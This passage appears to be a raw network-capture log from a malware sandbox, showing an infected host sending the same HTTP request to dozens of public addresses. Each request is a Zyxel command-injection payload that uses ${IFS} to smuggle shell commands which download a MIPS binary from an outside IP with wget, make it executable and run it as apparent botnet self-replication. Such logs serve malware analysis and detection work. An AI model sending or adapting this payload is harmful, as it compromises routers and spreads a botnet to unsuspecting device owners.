                                                Jan 12, 2024 18:16:12.191086054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1747192.168.2.2339582190.186.124.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.191132069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1748192.168.2.2357498167.51.216.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.191149950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1749192.168.2.236039050.185.120.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.191195011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1750192.168.2.234564491.227.7.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.191229105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1751192.168.2.235195036.142.31.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.191277027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1752192.168.2.235679886.144.13.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.191324949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1753192.168.2.2349642110.178.21.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.191363096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1754192.168.2.234264691.117.183.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.191405058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1755192.168.2.2349698155.96.52.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.191433907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1756192.168.2.2337222175.188.16.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.191461086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1757192.168.2.2347742126.174.57.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.191514015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1758192.168.2.234944073.183.4.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.191546917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1759192.168.2.234063047.219.217.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.191591978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1760192.168.2.23433182.137.211.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.191612005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1761192.168.2.2337714201.51.2.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.191648006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1762192.168.2.2348416201.100.58.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.191696882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1763192.168.2.233914862.238.88.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.191725969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1764192.168.2.233372292.45.226.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.191785097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1765192.168.2.233373645.123.135.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.191817045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1766192.168.2.235689697.154.10.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.191847086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1767192.168.2.234909667.129.183.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.191880941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1768192.168.2.234086070.174.150.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.191921949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1769192.168.2.234231283.83.182.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.191973925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1770192.168.2.2340180190.65.168.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.192013025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1771192.168.2.234696096.245.46.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.192059040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1772192.168.2.234729862.124.71.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.192090034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1773192.168.2.2341058134.38.51.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.192138910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1774192.168.2.2334860150.142.5.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.192179918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1775192.168.2.2346274204.248.168.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.192226887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1776192.168.2.234524446.230.131.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.192276001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1777192.168.2.234225440.9.205.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.192297935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1778192.168.2.2355940183.14.92.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.192342997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1779192.168.2.233423047.90.82.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.192370892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1780192.168.2.2339348182.59.197.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.192418098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1781192.168.2.234309832.160.125.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.192473888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1782192.168.2.2349304160.81.253.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.192523003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1783192.168.2.2357532112.162.34.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.192545891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1784192.168.2.236002271.160.55.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.192604065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1785192.168.2.2347978147.220.68.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.192636967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1786192.168.2.2353062167.109.249.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.192677021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1787192.168.2.235287645.47.107.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.192703962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1788192.168.2.2355812113.164.57.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.192754984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1789192.168.2.236004478.189.215.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.192795038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1790192.168.2.234703220.231.33.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.192819118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1791192.168.2.2342968117.187.238.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.192888021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1792192.168.2.233476686.190.127.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.192925930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1793192.168.2.235041475.198.91.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.192970037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1794192.168.2.2348600194.53.195.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.193000078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1795192.168.2.235456866.217.30.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.193042994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1796192.168.2.2339992154.158.108.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.193073988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1797192.168.2.235939839.141.248.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.193126917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1798192.168.2.234241893.202.154.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.193159103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1799192.168.2.2344990148.23.183.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.193193913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1800192.168.2.2338260101.107.219.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.193243027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1801192.168.2.234165636.1.51.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.193280935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1802192.168.2.2359278137.26.252.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.193330050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1803192.168.2.2352354177.27.160.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.193368912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1804192.168.2.235994252.148.35.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.193402052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1805192.168.2.235694261.11.239.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.193447113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1806192.168.2.2351832105.195.247.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.193494081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1807192.168.2.2351592185.253.232.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.193536997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1808192.168.2.2353550186.72.251.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.193577051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1809192.168.2.2338150198.147.129.175443
                                                TimestampBytes transferredDirectionData
